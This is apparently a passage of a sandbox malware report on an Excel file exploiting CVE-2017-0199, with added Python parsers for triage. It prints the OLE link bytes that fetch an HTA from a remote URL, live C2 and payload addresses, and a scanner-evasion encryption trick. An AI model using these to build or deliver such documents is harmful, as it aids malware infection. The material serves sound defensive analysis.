                                                      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      General
                                                      Stream Path:MBD0032CD06/\x1Ole
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:492
                                                      Entropy:6.046678422301103
                                                      Base64 Encoded:False
                                                      Data ASCII:. . . . . ? & f @ ) . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . z . h . o . r . t . . . d . e . / . p . i . t . a . s . h . . . . i . m m . K H i " R . S k ) J K A . J w ` 7 Y \\ x M . . . . . \\ g l 7 - g 8 . C . . 1 . ? L . . , < i S : W ] ! 7 h . . . . F v . ; . " o [ . ^ y . ! . 2 J + ~ J I . K s 7 i . . 4 m \\ R X 6 p . @ . * . " . h & i . . . ~ . 8 . . . . . . . . . . . . . . . . . . . b . u . V . F . f . A . 6 . k . t . J . 4 . s . v . p . q . 2 . n . u . j . S
                                                      Data Raw:01 00 00 02 07 fd 3f 26 66 96 40 29 00 00 00 00 00 00 00 00 00 00 00 00 02 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b fe 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 7a 00 68 00 6f 00 72 00 74 00 2e 00 64 00 65 00 2f 00 70 00 69 00 74 00 61 00 73 00 68 00 00 00 a1 00 69 1a e1 6d 6d a8 ce cf a6 d5 4b 48 69 8c f3 22 e2 81 52 07 53 6b 29 4a 4b 41 af 1b f5 84
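Added example, not part of the Joe Sandbox report: the MBD0032CD06/\x01Ole stream above is an OLEStream (MS-OLEDS 2.3.3) whose absolute source moniker starts with the CLSID {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}, the URL moniker class, followed by a length field and a UTF-16LE URL (visible in the ASCII dump as h.t.t.p.s.:././.z.h.o.r.t...d.e./.p.i.t.a.s.h). An OLE link with a URL moniker as its source is resolved through URLMon when Excel activates the embedded object, which is the OLE2Link layout associated with CVE-2017-0199 and matches the "HTA dl" Suricata alerts further down this page. The parser below, written for this page rather than taken from the report or any tool, walks the header bytes exactly as the Data Raw field prints them (only the first 128 of 492 bytes are shown, so it flags the stream as truncated) and returns the moniker CLSID and the URL that would be fetched. The field names follow MS-OLEDS; the byte string is copied from the report.

```python
import struct
import uuid

# First 128 of the 492 bytes of MBD0032CD06/\x01Ole, copied from the report's
# "Data Raw" field above (the report truncates the dump at this point).
OLE_STREAM_HEAD = bytes.fromhex(
    "01 00 00 02 07 fd 3f 26 66 96 40 29 00 00 00 00 00 00 00 00 00 00 00 00 "
    "02 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b fe 00 00 00 "
    "68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 7a 00 68 00 6f 00 72 00 "
    "74 00 2e 00 64 00 65 00 2f 00 70 00 69 00 74 00 61 00 73 00 68 00 00 00 "
    "a1 00 69 1a e1 6d 6d a8 ce cf a6 d5 4b 48 69 8c f3 22 e2 81 52 07 53 6b "
    "29 4a 4b 41 af 1b f5 84"
)

# CLSID of the URL moniker class. An OLE link whose source moniker has this
# class is resolved through URLMon when the linked object is activated.
URL_MONIKER_CLSID = uuid.UUID("79EAC9E0-BAF9-11CE-8C82-00AA004BA90B")


def parse_url_moniker(stream_data):
    """URL moniker serialisation: DWORD length, then a null-terminated UTF-16LE URL."""
    (length,) = struct.unpack_from("<I", stream_data, 0)
    body = stream_data[4:4 + length]
    # The terminator must sit on a UTF-16 code-unit boundary, so step by two;
    # a naive find(b"\x00\x00") would stop one byte early on 'h\x00\x00\x00'.
    for i in range(0, len(body) - 1, 2):
        if body[i] == 0 and body[i + 1] == 0:
            return body[:i].decode("utf-16-le")
    raise ValueError("URL not terminated inside the available bytes")


def parse_ole_stream(data):
    """Walk the OLEStream header: Version, Flags, LinkUpdateOption, Reserved1,
    then three length-prefixed MONIKERSTREAMs (reserved, relative, absolute).
    Each MONIKERSTREAM begins with the moniker's CLSID; for a URL moniker the
    serialised URL follows the CLSID."""
    version, flags, link_update, _reserved = struct.unpack_from("<IIII", data, 0)
    out = {"version": version, "flags": flags, "link_update_option": link_update}
    off = 16
    for name in ("reserved", "relative", "absolute"):
        (size,) = struct.unpack_from("<I", data, off)
        off += 4
        out[f"{name}_moniker_size"] = size
        if size == 0:
            continue
        clsid_bytes = data[off:off + 16]
        if len(clsid_bytes) < 16:            # dump ends before the CLSID
            out["truncated"] = True
            break
        clsid = uuid.UUID(bytes_le=clsid_bytes)
        out[f"{name}_moniker_clsid"] = str(clsid).upper()
        if clsid == URL_MONIKER_CLSID:
            out[f"{name}_url"] = parse_url_moniker(data[off + 16:])
        off += size
        if off > len(data):                  # the report shows only the head of the stream
            out["truncated"] = True
            break
    return out


def remote_link_target(data):
    """URL an activated OLE object would fetch, or None if the link is not a URL moniker."""
    info = parse_ole_stream(data)
    return info.get("absolute_url") or info.get("relative_url")


if __name__ == "__main__":
    for key, value in parse_ole_stream(OLE_STREAM_HEAD).items():
        print(f"{key:>24}: {value}")
```

Run stand-alone it prints the version 0x02000001, the empty reserved and relative monikers, the 258-byte absolute moniker with the URL moniker CLSID and the URL https://zhort.de/pitash. The packet list further down shows a TLS session to 88.99.66.38:443 immediately before the HTTP fetch from 192.3.193.155:80 that triggered the HTA alerts, which is consistent with the URL above redirecting to the HTA host, although the report does not include the DNS answer for zhort.de.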
                                                      General
                                                      Stream Path:Workbook
                                                      CLSID:
File Type:Applesoft BASIC program data, first line number 16 (libmagic misidentification: the stream begins with a BIFF8 BOF record, 09 08 10 00, so this is the Excel Workbook stream; "16" is the BOF record length)
                                                      Stream Size:530977
                                                      Entropy:7.999355654910445
                                                      Base64 Encoded:True
                                                      Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . f > q W . . . . / s . , : Y . . . B . X . ] ? % * W . . . . . . . . . . . \\ . p . . / X } S } ( _ k . . f w . [ k K 0 | . \\ . { . Y < 2 I . ? . E . y 0 x @ . . Q . ^ . . . @ o . . $ . Y Y . > $ V . . B . . . . a . . . . . . . . = . . . o . . { . . . . ; l . . 1 , ' . . . @ V . . . . 5 . . . . . . . . . . 3 . . . . . . . . = . . . 5 . p 7 + . > . / P . . h @ . . . S b . . . . " . . . . . . . . | p . . . p . . . . 1 . . . . C ! . . A z < . ( . f \\ ( N .
                                                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 c8 66 c0 b1 3e 9e 71 84 57 de 9f 0a dd 88 b8 2e 2f 8b fd bc 73 12 2c 3a 59 0b ce 91 f0 9c c4 8c 42 f7 0b 58 8c 82 1c 9c d8 5d 95 9f 3f 25 2a 57 e1 00 02 00 b0 04 c1 00 02 00 1d b6 e2 00 00 00 5c 00 70 00 0b 91 2f f3 58 7d 81 8f 53 bb 7d af fd 28 5f b5 6b fc cc 12 1c e0 ab f7 66 dc 77 fe 1e a4
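Added example, not part of the report: an entropy of 7.9994 over a 530 KB Workbook stream is not what a plaintext BIFF8 workbook produces, and the Data Raw bytes explain it. The BOF record (09 08 10 00, version 0x0600, substream type 0x0005 = workbook globals) is immediately followed by a FILEPASS record (2f 00 36 00) with wEncryptionType 1 and EncryptionVersionInfo 1.1, i.e. the Workbook stream is RC4-encrypted under the "standard" scheme of MS-OFFCRYPTO 2.3.6, and every record after it except a handful of header records is ciphertext. Excel opens such a file without prompting when the password is its built-in default, VelvetSweatshop, a long-used way to keep static scanners from seeing sheet contents; the report does not state which password this sample uses, so that is not asserted here. Note also that FILEPASS only covers the Workbook stream: the VBA project in _VBA_PROJECT_CUR and the OLE objects in the MBD* storages are not affected by it. The parser below is written for this page (it is not olefile, oletools or any Joe Sandbox component); it walks the records present in the dump and decodes the FILEPASS header. Record IDs are from MS-XLS, the byte string is copied from the Data Raw field above.

```python
import struct

# First 128 bytes of the Workbook stream, copied from the report's "Data Raw" field.
WORKBOOK_HEAD = bytes.fromhex(
    "09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 "
    "01 00 01 00 01 00 c8 66 c0 b1 3e 9e 71 84 57 de 9f 0a dd 88 b8 2e 2f 8b "
    "fd bc 73 12 2c 3a 59 0b ce 91 f0 9c c4 8c 42 f7 0b 58 8c 82 1c 9c d8 5d "
    "95 9f 3f 25 2a 57 e1 00 02 00 b0 04 c1 00 02 00 1d b6 e2 00 00 00 5c 00 "
    "70 00 0b 91 2f f3 58 7d 81 8f 53 bb 7d af fd 28 5f b5 6b fc cc 12 1c e0 "
    "ab f7 66 dc 77 fe 1e a4"
)

BOF, FILEPASS = 0x0809, 0x002F
RECORD_NAMES = {
    BOF: "BOF", FILEPASS: "FILEPASS", 0x00E1: "INTERFACEHDR",
    0x00C1: "MMS", 0x00E2: "INTERFACEEND", 0x005C: "WRITEACCESS",
}


def iter_biff_records(data):
    """Yield (record_type, body, truncated) for every BIFF record header in data.
    Each record is a 2-byte type, a 2-byte length and the body; truncated is set
    when the dump ends before the body is complete."""
    off = 0
    while off + 4 <= len(data):
        rtype, rlen = struct.unpack_from("<HH", data, off)
        body = data[off + 4:off + 4 + rlen]
        yield rtype, body, len(body) < rlen
        off += 4 + rlen


def parse_filepass(body):
    """Decode a FILEPASS record into its encryption parameters."""
    (enc_type,) = struct.unpack_from("<H", body, 0)
    if enc_type == 0:                                   # legacy XOR obfuscation
        key, verifier = struct.unpack_from("<HH", body, 2)
        return {"scheme": "XOR obfuscation", "key": key, "verifier": verifier}
    major, minor = struct.unpack_from("<HH", body, 2)   # EncryptionVersionInfo
    info = {"major": major, "minor": minor}
    if (major, minor) == (1, 1):
        # RC4 "standard" encryption: 16-byte salt, encrypted verifier, encrypted verifier hash
        info.update(
            scheme="RC4 (standard)",
            salt=body[6:22].hex(),
            encrypted_verifier=body[22:38].hex(),
            encrypted_verifier_hash=body[38:54].hex(),
        )
    elif major in (2, 3, 4) and minor == 2:
        info["scheme"] = "RC4 CryptoAPI"
    else:
        info["scheme"] = "unknown"
    return info


def triage_workbook(data):
    """Summarise the record sequence and report whether the stream is encrypted."""
    out = {"records": [], "encryption": None}
    for rtype, body, truncated in iter_biff_records(data):
        name = RECORD_NAMES.get(rtype, f"0x{rtype:04X}")
        out["records"].append(name)
        if rtype == BOF and len(body) >= 4:
            vers, dt = struct.unpack_from("<HH", body, 0)
            out["bof"] = {"version": vers, "substream_type": dt}
        elif rtype == FILEPASS:
            out["encryption"] = parse_filepass(body)
        if truncated:                    # only the head of the stream is in the report
            out["truncated_at"] = name
            break
    return out


def is_encrypted(data):
    return triage_workbook(data)["encryption"] is not None


if __name__ == "__main__":
    for key, value in triage_workbook(WORKBOOK_HEAD).items():
        print(f"{key:>14}: {value}")
```

On the bytes above this reports BOF, FILEPASS, INTERFACEHDR, MMS, INTERFACEEND and a truncated WRITEACCESS record, with the RC4 standard parameters and the salt c866c0b13e9e718457de9f0add88b82e. The decrypted verifier check itself is left out on purpose: it needs the password, which the report does not give.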
                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                      CLSID:
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Stream Size:533
                                                      Entropy:5.247618732791725
                                                      Base64 Encoded:True
                                                      Data ASCII:I D = " { 6 3 B 7 5 A 4 7 - 8 F 4 8 - 4 4 C 4 - B 0 9 9 - 2 1 C 4 3 3 5 F 7 D 1 E } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E 7 E 5 2 F F 2 D 1 0 E 3 4 1 2 3
                                                      Data Raw:49 44 3d 22 7b 36 33 42 37 35 41 34 37 2d 38 46 34 38 2d 34 34 43 34 2d 42 30 39 39 2d 32 31 43 34 33 33 35 46 37 44 31 45 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:104
                                                      Entropy:3.0488640812019017
                                                      Base64 Encoded:False
                                                      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:2644
                                                      Entropy:4.008029808248709
                                                      Base64 Encoded:False
                                                      Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                      Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:553
                                                      Entropy:6.382644741582946
                                                      Base64 Encoded:True
                                                      Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 8 s h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                                      Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 38 73 df 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
Timestamp | Protocol | SID | Signature | Severity | Source Port | Dest Port | Source IP | Dest IP
2024-08-28T06:56:30.438197+0200 | TCP | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 49166 | 80 | 192.168.2.22 | 192.3.193.155
2024-08-28T06:56:30.438199+0200 | TCP | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 80 | 49166 | 192.3.193.155 | 192.168.2.22
2024-08-28T06:56:28.368449+0200 | TCP | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 49164 | 80 | 192.168.2.22 | 192.3.193.155
2024-08-28T06:56:50.218487+0200 | TCP | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 49175 | 80 | 192.168.2.22 | 192.3.193.155
2024-08-28T06:57:02.959463+0200 | TCP | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | 1 | 443 | 49176 | 207.241.232.154 | 192.168.2.22
2024-08-28T06:56:44.497830+0200 | TCP | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 80 | 49169 | 192.3.193.155 | 192.168.2.22
2024-08-28T06:56:44.497830+0200 | TCP | 2020425 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 | 1 | 80 | 49169 | 192.3.193.155 | 192.168.2.22
2024-08-28T06:56:46.416632+0200 | TCP | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 49170 | 14645 | 192.168.2.22 | 192.3.64.135
2024-08-28T06:56:47.844263+0200 | TCP | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 49172 | 80 | 192.168.2.22 | 178.237.33.50
2024-08-28T06:56:28.368474+0200 | TCP | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 80 | 49164 | 192.3.193.155 | 192.168.2.22
2024-08-28T06:57:03.728683+0200 | TCP | 2020423 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 | 1 | 80 | 49177 | 192.3.193.155 | 192.168.2.22
2024-08-28T06:57:03.728683+0200 | TCP | 2020425 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 | 1 | 80 | 49177 | 192.3.193.155 | 192.168.2.22
2024-08-28T06:56:43.690731+0200 | TCP | 2049038 | ET MALWARE Malicious Base64 Encoded Payload In Image | 1 | 443 | 49168 | 207.241.232.154 | 192.168.2.22
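Added example, not part of the report: the thirteen alerts above are emitted per packet direction, so one TCP conversation can appear twice (the client-side SID 2024449 and the server-side SID 2024197 on port 49164 are the same HTA download) and the rows are not in time order. The script below, written for this page, regroups the alerts into flows keyed by the sandbox client's ephemeral port, orders the flows by their first alert and tags each with a coarse stage derived from the signature family, which turns the table into the chain HTA download, base64 stager, Remcos TLS C2, image-hosted payload. The alert values are transcribed from the table; the stage labels and the rule that the endpoint with the higher port is the client (ephemeral ports on this sandbox are all 49xxx) are this example's own assumptions. The same client ports appear in the raw packet list that follows, so the flow keys can be matched against it directly.

```python
from collections import defaultdict
from datetime import datetime

HTA_DL = "ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl"
HTA_RESP = "ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)"
EK_B64_1 = "ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1"
EK_B64_3 = "ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1"
IMG_B64 = "ET MALWARE Malicious Base64 Encoded Payload In Image"
REMCOS_JA3 = "ET JA3 Hash - Remcos 3.x/4.x TLS Connection"
DL_HDR = "ETPRO MALWARE Common Downloader Header Pattern HCa"

# The 13 alerts from the table above, transcribed as
# (timestamp, proto, sid, signature, priority, src_port, dst_port, src_ip, dst_ip).
ALERTS = [
    ("2024-08-28T06:56:30.438197+0200", "TCP", 2024449, HTA_DL, 1, 49166, 80, "192.168.2.22", "192.3.193.155"),
    ("2024-08-28T06:56:30.438199+0200", "TCP", 2024197, HTA_RESP, 1, 80, 49166, "192.3.193.155", "192.168.2.22"),
    ("2024-08-28T06:56:28.368449+0200", "TCP", 2024449, HTA_DL, 1, 49164, 80, "192.168.2.22", "192.3.193.155"),
    ("2024-08-28T06:56:50.218487+0200", "TCP", 2024449, HTA_DL, 1, 49175, 80, "192.168.2.22", "192.3.193.155"),
    ("2024-08-28T06:57:02.959463+0200", "TCP", 2049038, IMG_B64, 1, 443, 49176, "207.241.232.154", "192.168.2.22"),
    ("2024-08-28T06:56:44.497830+0200", "TCP", 2020423, EK_B64_1, 1, 80, 49169, "192.3.193.155", "192.168.2.22"),
    ("2024-08-28T06:56:44.497830+0200", "TCP", 2020425, EK_B64_3, 1, 80, 49169, "192.3.193.155", "192.168.2.22"),
    ("2024-08-28T06:56:46.416632+0200", "TCP", 2036594, REMCOS_JA3, 1, 49170, 14645, "192.168.2.22", "192.3.64.135"),
    ("2024-08-28T06:56:47.844263+0200", "TCP", 2803304, DL_HDR, 3, 49172, 80, "192.168.2.22", "178.237.33.50"),
    ("2024-08-28T06:56:28.368474+0200", "TCP", 2024197, HTA_RESP, 1, 80, 49164, "192.3.193.155", "192.168.2.22"),
    ("2024-08-28T06:57:03.728683+0200", "TCP", 2020423, EK_B64_1, 1, 80, 49177, "192.3.193.155", "192.168.2.22"),
    ("2024-08-28T06:57:03.728683+0200", "TCP", 2020425, EK_B64_3, 1, 80, 49177, "192.3.193.155", "192.168.2.22"),
    ("2024-08-28T06:56:43.690731+0200", "TCP", 2049038, IMG_B64, 1, 443, 49168, "207.241.232.154", "192.168.2.22"),
]


def flow_key(src_ip, src_port, dst_ip, dst_port):
    """Fold both directions of a conversation onto one (client, server) key.
    Assumption of this example: the endpoint with the higher port is the client,
    which holds here because the sandbox's ephemeral ports are all in the 49xxx range."""
    if src_port >= dst_port:
        return (src_ip, src_port, dst_ip, dst_port)
    return (dst_ip, dst_port, src_ip, src_port)


def stage(signatures):
    """Coarse kill-chain label from the ET signature families seen on a flow (own labels)."""
    joined = " ".join(signatures)
    if "CVE-2017-0199" in joined:
        return "initial access: OLE link fetches HTA"
    if "EXPLOIT_KIT" in joined:
        return "stager: base64 landing content"
    if "Payload In Image" in joined:
        return "payload: base64 blob hidden in image"
    if "Remcos" in joined:
        return "C2: Remcos TLS (JA3 match)"
    if "Downloader" in joined:
        return "downloader beacon"
    return "unclassified"


def correlate(alerts):
    """Group alerts by flow, order flows by first alert, attach SIDs, priority and stage."""
    flows = defaultdict(list)
    for ts, _proto, sid, sig, prio, sp, dp, sip, dip in alerts:
        t = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")   # %z accepts +0200
        flows[flow_key(sip, sp, dip, dp)].append((t, sid, sig, prio))
    out = []
    for (cip, cport, sip, sport), hits in flows.items():
        hits.sort(key=lambda h: h[0])
        out.append({
            "client_ip": cip, "client_port": cport,
            "server_ip": sip, "server_port": sport,
            "first_seen": hits[0][0],
            "sids": [h[1] for h in hits],
            "priority": min(h[3] for h in hits),   # Suricata priority: 1 is the most urgent
            "stage": stage(h[2] for h in hits),
        })
    out.sort(key=lambda f: f["first_seen"])
    return out


if __name__ == "__main__":
    for f in correlate(ALERTS):
        print(f"{f['first_seen'].time()} {f['client_ip']}:{f['client_port']} -> "
              f"{f['server_ip']}:{f['server_port']}  sids={f['sids']}  {f['stage']}")
```

The thirteen rows collapse to nine flows whose time order is also ascending client-port order (49164, 49166, 49168, ...), a cheap sanity check that the direction normalisation did not mis-assign a server port as the client. Ports with no alert in between (49163, 49165, 49167, 49171, 49173, 49174) are flows Suricata had no rule for; the packet list shows 49163 as a TLS session to 88.99.66.38:443.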
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 28, 2024 06:56:26.875268936 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:56:26.875298023 CEST | 443 | 49163 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:56:26.875360012 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:56:26.881853104 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:56:26.881865025 CEST | 443 | 49163 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:56:27.558701038 CEST | 443 | 49163 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:56:27.558856964 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:56:27.564241886 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:56:27.564249992 CEST | 443 | 49163 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:56:27.564629078 CEST | 443 | 49163 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:56:27.564686060 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:56:27.662404060 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:56:27.704500914 CEST | 443 | 49163 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:56:27.863586903 CEST | 443 | 49163 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:56:27.863703966 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:56:27.863717079 CEST | 443 | 49163 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:56:27.863778114 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:56:27.864793062 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:56:27.864833117 CEST | 443 | 49163 | 88.99.66.38 | 192.168.2.22
Aug 28, 2024 06:56:27.864903927 CEST | 49163 | 443 | 192.168.2.22 | 88.99.66.38
Aug 28, 2024 06:56:27.869781017 CEST | 49164 | 80 | 192.168.2.22 | 192.3.193.155
Aug 28, 2024 06:56:27.874687910 CEST | 80 | 49164 | 192.3.193.155 | 192.168.2.22
Aug 28, 2024 06:56:27.874747992 CEST | 49164 | 80 | 192.168.2.22 | 192.3.193.155
Aug 28, 2024 06:56:27.874830961 CEST | 49164 | 80 | 192.168.2.22 | 192.3.193.155
Aug 28, 2024 06:56:27.879740953 CEST | 80 | 49164 | 192.3.193.155 | 192.168.2.22
Aug 28, 2024 06:56:28.368331909 CEST | 80 | 49164 | 192.3.193.155 | 192.168.2.22
Aug 28, 2024 06:56:28.368351936 CEST | 80 | 49164 | 192.3.193.155 | 192.168.2.22
Aug 28, 2024 06:56:28.368361950 CEST | 80 | 49164 | 192.3.193.155 | 192.168.2.22
Aug 28, 2024 06:56:28.368374109 CEST | 80 | 49164 | 192.3.193.155 | 192.168.2.22
Aug 28, 2024 06:56:28.368386030 CEST | 80 | 49164 | 192.3.193.155 | 192.168.2.22
Aug 28, 2024 06:56:28.368396044 CEST | 80 | 49164 | 192.3.193.155 | 192.168.2.22
Aug 28, 2024 06:56:28.368407965 CEST | 80 | 49164 | 192.3.193.155 | 192.168.2.22
Aug 28, 2024 06:56:28.368448973 CEST | 49164 | 80 | 192.168.2.22 | 192.3.193.155
Aug 28, 2024 06:56:28.368474007 CEST | 80 | 49164 | 192.3.193.155 | 192.168.2.22
Aug 28, 2024 06:56:28.368474007 CEST | 49164 | 80 | 192.168.2.22 | 192.3.193.155
Aug 28, 2024 06:56:28.368493080 CEST | 80 | 49164 | 192.3.193.155 | 192.168.2.22
Aug 28, 2024 06:56:28.368504047 CEST | 80 | 49164 | 192.3.193.155 | 192.168.2.22
Aug 28, 2024 06:56:28.368513107 CEST | 49164 | 80 | 192.168.2.22 | 192.3.193.155
Aug 28, 2024 06:56:28.368530989 CEST | 49164 | 80 | 192.168.2.22 | 192.3.193.155
Aug 28, 2024 06:56:28.368540049 CEST | 49164 | 80 | 192.168.2.22 | 192.3.193.155
Aug 28, 2024 06:56:28.373351097 CEST | 80 | 49164 | 192.3.193.155 | 192.168.2.22
Aug 28, 2024 06:56:28.373370886 CEST | 80 | 49164 | 192.3.193.155 | 192.168.2.22
Aug 28, 2024 06:56:28.373382092 CEST | 80 | 49164 | 192.3.193.155 | 192.168.2.22
Aug 28, 2024 06:56:28.373409033 CEST | 49164 | 80 | 192.168.2.22 | 192.3.193.155
Aug 28, 2024 06:56:28.373425961 CEST | 49164 | 80 | 192.168.2.22 | 192.3.193.155
Aug 28, 2024 06:56:28.399677992 CEST | 49164 | 80 | 192.168.2.22 | 192.3.193.155
Aug 28, 2024 06:56:28.458889961 CEST | 80 | 49164 | 192.3.193.155 | 192.168.2.22
